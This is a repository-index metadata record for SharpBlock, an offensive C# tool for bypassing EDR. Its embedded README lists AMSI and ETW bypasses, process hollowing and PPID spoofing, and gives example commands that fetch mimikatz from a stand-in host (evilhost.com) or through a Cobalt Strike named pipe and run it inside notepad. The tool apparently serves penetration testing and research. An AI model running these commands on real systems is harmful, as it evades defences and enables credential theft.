{"id":31547026,"url":"https://github.com/CCob/SharpBlock","last_synced_at":"2025-10-04T15:56:53.719Z","repository":{"id":37435568,"uuid":"272179843","full_name":"CCob/SharpBlock","owner":"CCob","description":"A method of bypassing EDR's active projection DLL's by preventing entry point exection","archived":false,"fork":false,"pushed_at":"2021-03-31T09:44:48.000Z","size":248,"stargazers_count":1143,"open_issues_count":2,"forks_count":160,"subscribers_count":19,"default_branch":"master","last_synced_at":"2025-05-23T21:06:41.074Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/CCob.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null},"funding":{"github":["CCob"]}},"created_at":"2020-06-14T10:32:16.000Z","updated_at":"2025-05-22T23:20:02.000Z","dependencies_parsed_at":"2022-07-12T14:03:14.073Z","dependency_job_id":null,"html_url":"https://github.com/CCob/SharpBlock","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/CCob/SharpBlock","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCob%2FSharpBlock","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCob%2FSharpBlock/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCob%2FSharpBlock/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCob%2FSharpBlock/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/CCob","download_url":"https://codeload.github.com/CCob/SharpBlock/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCob%2FSharpBlock/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":278335452,"owners_count":25970129,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-04T02:00:05.491Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-10-04T15:56:45.114Z","updated_at":"2025-10-04T15:56:53.710Z","avatar_url":"https://github.com/CCob.png","language":"C#","readme":"# SharpBlock\nA method of bypassing EDR's active projection DLL's by preventing entry point execution.  \n\n## Features\n\n* Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.\n* Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.\n* Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike)\n* Implanted process is hidden to help evade scanners looking for hollowed processes.\n* Command line args are spoofed and implanted after process creation using stealthy EDR detection method.\n* Patchless ETW bypass.\n* Blocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space\n\n```\nSharpBlock by @_EthicalChaos_\n  DLL Blocking app for child processes x64\n\n  -e, --exe=VALUE            Program to execute (default cmd.exe)\n  -a, --args=VALUE           Arguments for program (default null)\n  -n, --name=VALUE           Name of DLL to block\n  -c, --copyright=VALUE      Copyright string to block\n  -p, --product=VALUE        Product string to block\n  -d, --description=VALUE    Description string to block\n  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe\n  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)\n  -w, --show                 Show the lauched process window instead of the\n                               default hide\n      --disable-bypass-amsi  Disable AMSI bypassAmsi\n      --disable-bypass-cmdline\n                             Disable command line bypass\n      --disable-bypass-etw   Disable ETW bypass\n      --disable-header-patch Disable process hollow detection bypass\n  -h, --help                 Display this help\n  ```\n\n## Examples\n\n### Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL\n\n```\nSharpBlock -e http://evilhost.com/mimikatz.bin -s c:\\windows\\system32\\notepad.exe -d \"Active Protection DLL for SylantStrike\" -a coffee\n```\n\n### Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL\n\n```\nexecute-assembly SharpBlock.exe -e \\\\.\\pipe\\mimi -s c:\\windows\\system32\\notepad.exe -d \"Active Protection DLL for SylantStrike\" -a coffee\nupload_file /home/haxor/mimikatz.exe \\\\.\\pipe\\mimi\n```\n*Note, for the `upload_file` beacon command, load upload.cna into Cobalt Strike's Script Manager*\n\n\n\nAccompanying Blog Posts: \n * https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/\n * https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/\n * https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/\n \n","funding_links":["https://github.com/sponsors/CCob"],"categories":["EDR Evasion Tools and Methods","Pentesting"],"sub_categories":["Miscellaneous Listeners","Exploits"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FCCob%2FSharpBlock","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FCCob%2FSharpBlock","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FCCob%2FSharpBlock/lists"}